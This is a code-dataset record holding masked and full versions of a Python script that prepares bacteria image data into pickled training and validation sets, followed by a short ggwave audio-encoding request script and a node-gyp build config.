{ "blob_id": "28c4c09b81d63785750cee36a8efd77760cac451", "index": 7231, "step-1": "<mask token>\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\n<mask token>\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' 
% set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\n<mask token>\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\n<mask token>\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = 
Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\ndef process_images(folder):\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))]\n img_cnt = 0\n for class_x in classes:\n if os.path.isdir(class_x):\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(\n class_x)) if i != '.DS_Store']\n for image in images:\n img_cnt = img_cnt + 1\n if img_cnt % 1000 == 0:\n print('Processed %s images' % str(img_cnt))\n im = Image.open(image)\n im = im.resize(dimensions)\n im.save(image)\n print('Finished processing images, images found = ')\n print(img_cnt)\n\n\n<mask token>\n\n\ndef load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3\n ), dtype=np.float32)\n print(dataset.shape)\n num_images = 0\n for image_index, image in enumerate(image_files):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n print(image_data.shape)\n if image_data.shape != (image_size, image_size, 3):\n raise Exception('Unexpected image shape: %s' % str(\n image_data.shape))\n dataset[num_images, :, :] = image_data\n num_images = num_images + 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, \"- it's ok, skipping.\"\n )\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (\n num_images, min_num_images))\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', 
np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' % set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\n<mask token>\n\n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32\n )\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n dataset, labels = None, None\n return dataset, labels\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = 
letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\n<mask token>\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\ndef process_images(folder):\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))]\n img_cnt = 0\n for class_x in classes:\n if os.path.isdir(class_x):\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(\n class_x)) if i != '.DS_Store']\n for image in images:\n img_cnt = img_cnt + 1\n if img_cnt % 1000 == 0:\n print('Processed %s images' % str(img_cnt))\n im = Image.open(image)\n im = im.resize(dimensions)\n im.save(image)\n print('Finished processing images, images found = ')\n print(img_cnt)\n\n\nprocess_images(test_folder)\nprocess_images(train_folder)\nprint('ok')\n<mask token>\n\n\ndef load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = 
np.ndarray(shape=(len(image_files), image_size, image_size, 3\n ), dtype=np.float32)\n print(dataset.shape)\n num_images = 0\n for image_index, image in enumerate(image_files):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n print(image_data.shape)\n if image_data.shape != (image_size, image_size, 3):\n raise Exception('Unexpected image shape: %s' % str(\n image_data.shape))\n dataset[num_images, :, :] = image_data\n num_images = num_images + 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, \"- it's ok, skipping.\"\n )\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (\n num_images, min_num_images))\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' 
% set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\n<mask token>\n\n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32\n )\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n dataset, labels = None, None\n return dataset, labels\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\n<mask token>\nprint('Training:', train_dataset.shape, train_labels.shape)\nprint('Validation:', valid_dataset.shape, valid_labels.shape)\n\n\ndef randomize(dataset, labels):\n permutation = 
np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n<mask token>\ntry:\n f = open(pickle_file, 'wb')\n save = {'train_dataset': train_dataset, 'train_labels': train_labels,\n 'valid_dataset': valid_dataset, 'valid_labels': valid_labels}\n pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\n f.close()\nexcept Exception as e:\n print('Unable to save data to', pickle_file, ':', e)\n raise\n<mask token>\nprint('Compressed pickle size:', statinfo.st_size)\n", "step-4": "from __future__ import print_function\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\nimport tarfile\nimport tensorflow as tf\nfrom IPython.display import display, Image\nfrom scipy import ndimage\nfrom sklearn.linear_model import LogisticRegression\nfrom six.moves.urllib.request import urlretrieve\nfrom six.moves import cPickle as pickle\nfrom PIL import Image\nfrom six.moves import range\ntrain_folder = './data/train'\ntest_folder = './data/valid'\ndimensions = 229, 229\nmax_angle = 15\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\ndef process_images(folder):\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))]\n img_cnt = 0\n for class_x in classes:\n if os.path.isdir(class_x):\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(\n class_x)) if 
i != '.DS_Store']\n for image in images:\n img_cnt = img_cnt + 1\n if img_cnt % 1000 == 0:\n print('Processed %s images' % str(img_cnt))\n im = Image.open(image)\n im = im.resize(dimensions)\n im.save(image)\n print('Finished processing images, images found = ')\n print(img_cnt)\n\n\nprocess_images(test_folder)\nprocess_images(train_folder)\nprint('ok')\nimage_size = 229\npixel_depth = 255.0\n\n\ndef load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3\n ), dtype=np.float32)\n print(dataset.shape)\n num_images = 0\n for image_index, image in enumerate(image_files):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n print(image_data.shape)\n if image_data.shape != (image_size, image_size, 3):\n raise Exception('Unexpected image shape: %s' % str(\n image_data.shape))\n dataset[num_images, :, :] = image_data\n num_images = num_images + 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, \"- it's ok, skipping.\"\n )\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (\n num_images, min_num_images))\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' 
% set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\ntrain_datasets = maybe_pickle(train_folder, 89, True)\ntest_datasets = maybe_pickle(test_folder, 10, True)\n\n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32\n )\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n dataset, labels = None, None\n return dataset, labels\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\ntrain_size = 89\nvalid_size = 10\nvalid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(\n train_datasets, 
train_size, valid_size)\nprint('Training:', train_dataset.shape, train_labels.shape)\nprint('Validation:', valid_dataset.shape, valid_labels.shape)\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\ntrain_dataset, train_labels = randomize(train_dataset, train_labels)\nvalid_dataset, valid_labels = randomize(valid_dataset, valid_labels)\npickle_file = './bacteria.pickle'\ntry:\n f = open(pickle_file, 'wb')\n save = {'train_dataset': train_dataset, 'train_labels': train_labels,\n 'valid_dataset': valid_dataset, 'valid_labels': valid_labels}\n pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\n f.close()\nexcept Exception as e:\n print('Unable to save data to', pickle_file, ':', e)\n raise\nstatinfo = os.stat(pickle_file)\nprint('Compressed pickle size:', statinfo.st_size)\n", "step-5": "\r\nfrom __future__ import print_function\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nimport sys\r\nimport tarfile\r\nimport tensorflow as tf\r\nfrom IPython.display import display, Image\r\nfrom scipy import ndimage\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom six.moves.urllib.request import urlretrieve\r\nfrom six.moves import cPickle as pickle\r\nfrom PIL import Image\r\nfrom six.moves import range\r\n\r\ntrain_folder = './data/train'\r\ntest_folder = './data/valid'\r\ndimensions = (229, 229)\r\nmax_angle = 15\r\n\r\n\r\n# rotating image\r\ndef rotate_img(image, angle, color, filter = Image.NEAREST):\r\n\r\n if image.mode == \"P\" or filter == Image.NEAREST:\r\n matte = Image.new(\"1\", image.size, 1) # mask\r\n else:\r\n matte = Image.new(\"L\", image.size, 255) # true matte\r\n bg = Image.new(image.mode, image.size, color)\r\n bg.paste(\r\n image.rotate(angle, filter),\r\n matte.rotate(angle, filter)\r\n )\r\n return bg\r\n\r\n# make gray_scale image or 1channel 
image\r\ndef make_greyscale_white_bg(im, r, b, g):\r\n\r\n im = im.convert('RGBA') # Convert to RGBA\r\n\r\n\r\n data = np.array(im) # \"data\" is a height x width x 4 numpy array\r\n red, green, blue, alpha = data.T # Temporarily unpack the bands for readability\r\n\r\n # Replace grey with white... (leaves alpha values alone...)\r\n grey_areas = (red == r) & (blue == b) & (green == g)\r\n data[..., :-1][grey_areas.T] = (255, 255, 255) # Transpose back needed\r\n\r\n im2 = Image.fromarray(data)\r\n im2 = im2.convert('L') # convert to greyscale image\r\n\r\n\r\n\r\n #im2.show()\r\n\r\n return im2\r\n\r\ndef process_images(folder):\r\n\r\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] # get list of all sub-folders in folder\r\n img_cnt = 0\r\n\r\n for class_x in classes:\r\n\r\n if os.path.isdir(class_x):\r\n\r\n # get paths to all the images in this folder\r\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(class_x)) if i != '.DS_Store']\r\n\r\n\r\n for image in images:\r\n\r\n img_cnt = img_cnt + 1\r\n\r\n if(img_cnt % 1000 == 0):\r\n print(\"Processed %s images\" % str(img_cnt))\r\n\r\n im = Image.open(image)\r\n im = im.resize(dimensions) # resize image according to dimensions set\r\n im.save(image) # overwrite previous image file with new image\r\n\r\n print(\"Finished processing images, images found = \")\r\n print(img_cnt)\r\n\r\n\r\nprocess_images(test_folder)\r\nprocess_images(train_folder)\r\n\r\nprint('ok')\r\n\r\nimage_size = 229 # Pixel width and height.\r\npixel_depth = 255.0 # Number of levels per pixel.\r\n\r\n\r\ndef load_letter(folder, min_num_images):\r\n\r\n\r\n image_files = os.listdir(folder)\r\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3), dtype=np.float32)\r\n print(dataset.shape)\r\n\r\n num_images = 0\r\n for image_index, image in enumerate(image_files):\r\n image_file = os.path.join(folder, image)\r\n try:\r\n image_data = (ndimage.imread(image_file).astype(float) - 
pixel_depth / 2) / pixel_depth\r\n print(image_data.shape)\r\n\r\n if image_data.shape != (image_size, image_size, 3):\r\n raise Exception('Unexpected image shape: %s' % str(image_data.shape))\r\n dataset[num_images, :, :] = image_data\r\n num_images = num_images + 1\r\n except IOError as e:\r\n print('Could not read:', image_file, ':', e, '- it\\'s ok, skipping.')\r\n\r\n dataset = dataset[0:num_images, :, :]\r\n if num_images < min_num_images:\r\n raise Exception('Many fewer images than expected: %d < %d' %\r\n (num_images, min_num_images))\r\n\r\n print('Full dataset tensor:', dataset.shape)\r\n print('Mean:', np.mean(dataset))\r\n print('Standard deviation:', np.std(dataset))\r\n return dataset\r\n\r\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\r\n dataset_names = []\r\n folders_list = os.listdir(data_folders)\r\n for folder in folders_list:\r\n\r\n\r\n #print(os.path.join(data_folders, folder))\r\n curr_folder_path = os.path.join(data_folders, folder)\r\n if os.path.isdir(curr_folder_path):\r\n set_filename = curr_folder_path + '.pickle'\r\n dataset_names.append(set_filename)\r\n if os.path.exists(set_filename) and not force:\r\n # # You may override by setting force=True.\r\n print('%s already present - Skipping pickling.' % set_filename)\r\n else:\r\n print('Pickling %s.' 
% set_filename)\r\n dataset = load_letter(curr_folder_path, min_num_images_per_class)\r\n try:\r\n with open(set_filename, 'wb') as f:\r\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\r\n f.close()\r\n except Exception as e:\r\n print('Unable to save data to', set_filename, ':', e)\r\n\r\n return dataset_names\r\n\r\ntrain_datasets = maybe_pickle(train_folder, 89, True)\r\ntest_datasets = maybe_pickle(test_folder, 10, True)\r\n\r\n\r\ndef make_arrays(nb_rows, img_size):\r\n if nb_rows:\r\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32)\r\n labels = np.ndarray(nb_rows, dtype=np.int32)\r\n else:\r\n dataset, labels = None, None\r\n return dataset, labels\r\n\r\ndef merge_datasets(pickle_files, train_size, valid_size=0):\r\n num_classes = len(pickle_files)\r\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\r\n train_dataset, train_labels = make_arrays(train_size, image_size)\r\n vsize_per_class = valid_size // num_classes\r\n tsize_per_class = train_size // num_classes\r\n\r\n start_v, start_t = 0, 0\r\n end_v, end_t = vsize_per_class, tsize_per_class\r\n end_l = vsize_per_class+tsize_per_class\r\n for label, pickle_file in enumerate(pickle_files):\r\n try:\r\n with open(pickle_file, 'rb') as f:\r\n letter_set = pickle.load(f)\r\n f.close()\r\n # let's shuffle the letters to have random validation and training set\r\n np.random.shuffle(letter_set)\r\n if valid_dataset is not None:\r\n valid_letter = letter_set[:vsize_per_class, :, :]\r\n valid_dataset[start_v:end_v, :, :] = valid_letter\r\n valid_labels[start_v:end_v] = label\r\n start_v += vsize_per_class\r\n end_v += vsize_per_class\r\n\r\n train_letter = letter_set[vsize_per_class:end_l, :, :]\r\n train_dataset[start_t:end_t, :, :] = train_letter\r\n train_labels[start_t:end_t] = label\r\n start_t += tsize_per_class\r\n end_t += tsize_per_class\r\n except Exception as e:\r\n print('Unable to process data from', pickle_file, ':', e)\r\n raise\r\n\r\n return 
valid_dataset, valid_labels, train_dataset, train_labels\r\n\r\n\r\ntrain_size = 89\r\nvalid_size = 10\r\n\r\n\r\nvalid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(\r\n train_datasets, train_size, valid_size)\r\n# _, _, test_dataset, test_labels = merge_datasets(test_datasets, test_size)\r\n\r\nprint('Training:', train_dataset.shape, train_labels.shape)\r\nprint('Validation:', valid_dataset.shape, valid_labels.shape)\r\n# print('Testing:', test_dataset.shape, test_labels.shape)\r\n\r\ndef randomize(dataset, labels):\r\n permutation = np.random.permutation(labels.shape[0])\r\n shuffled_dataset = dataset[permutation,:,:]\r\n shuffled_labels = labels[permutation]\r\n return shuffled_dataset, shuffled_labels\r\ntrain_dataset, train_labels = randomize(train_dataset, train_labels)\r\n# test_dataset, test_labels = randomize(test_dataset, test_labels)\r\nvalid_dataset, valid_labels = randomize(valid_dataset, valid_labels)\r\n\r\n\r\npickle_file = './bacteria.pickle'\r\n\r\ntry:\r\n f = open(pickle_file, 'wb')\r\n save = {\r\n 'train_dataset': train_dataset,\r\n 'train_labels': train_labels,\r\n 'valid_dataset': valid_dataset,\r\n 'valid_labels': valid_labels,\r\n }\r\n pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\r\n f.close()\r\nexcept Exception as e:\r\n print('Unable to save data to', pickle_file, ':', e)\r\n raise\r\n\r\n\r\nstatinfo = os.stat(pickle_file)\r\nprint('Compressed pickle size:', statinfo.st_size)\r\n", "step-ids": [ 5, 8, 9, 11, 12 ] }
[ 5, 8, 9, 11, 12 ]
import sys import requests def ggwave(message: str, protocolId: int = 1, sampleRate: float = 48000, volume: int = 50, payloadLength: int = -1): url = 'https://ggwave-to-file.ggerganov.com/' params = { 'm': message, # message to encode 'p': protocolId, # transmission protocol to use 's': sampleRate, # output sample rate 'v': volume, # output volume 'l': payloadLength, # if positive - use fixed-length encoding } response = requests.get(url, params=params) if response == '': raise SyntaxError('Request failed') return response result = ggwave("Hello world!") sys.stdout.buffer.write(result.content)
normal
{ "blob_id": "f5d285b3a82151b5d7efdcd07d56cc5aaaac5836", "index": 7213, "step-1": "<mask token>\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\n<mask token>\nsys.stdout.buffer.write(result.content)\n", "step-3": "<mask token>\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\nresult = ggwave('Hello world!')\nsys.stdout.buffer.write(result.content)\n", "step-4": "import sys\nimport requests\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\nresult = ggwave('Hello world!')\nsys.stdout.buffer.write(result.content)\n", "step-5": "import sys\nimport 
requests\n\ndef ggwave(message: str, protocolId: int = 1, sampleRate: float = 48000, volume: int = 50, payloadLength: int = -1):\n\n url = 'https://ggwave-to-file.ggerganov.com/'\n\n params = {\n 'm': message, # message to encode\n 'p': protocolId, # transmission protocol to use\n 's': sampleRate, # output sample rate\n 'v': volume, # output volume\n 'l': payloadLength, # if positive - use fixed-length encoding\n }\n\n response = requests.get(url, params=params)\n\n if response == '':\n raise SyntaxError('Request failed')\n\n return response\n\nresult = ggwave(\"Hello world!\")\n\nsys.stdout.buffer.write(result.content)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> {'targets': [{'target_name': 'force-layout', 'sources': ['src/main.cc', 'src/layout.cc', 'src/quadTree.cc'], 'conditions': [['OS=="win"', { 'cflags': ['/WX', '/std:latest', '/m']}, {'cflags': ['-std=c++11', '-fpermissive', '-fexceptions']}]], 'cflags!': ['-fno-exceptions'], 'cflags_cc!': ['-fno-exceptions']}]} <|reserved_special_token_1|> { "targets": [ { "target_name": "force-layout", "sources": [ "src/main.cc", "src/layout.cc", "src/quadTree.cc" ], 'conditions': [ ['OS=="win"', { 'cflags': [ '/WX', "/std:latest", "/m" ], }, { # OS != "win" 'cflags': [ "-std=c++11", "-fpermissive", "-fexceptions" ], }], ], 'cflags!': [ '-fno-exceptions' ], 'cflags_cc!': [ '-fno-exceptions' ] } ] }
flexible
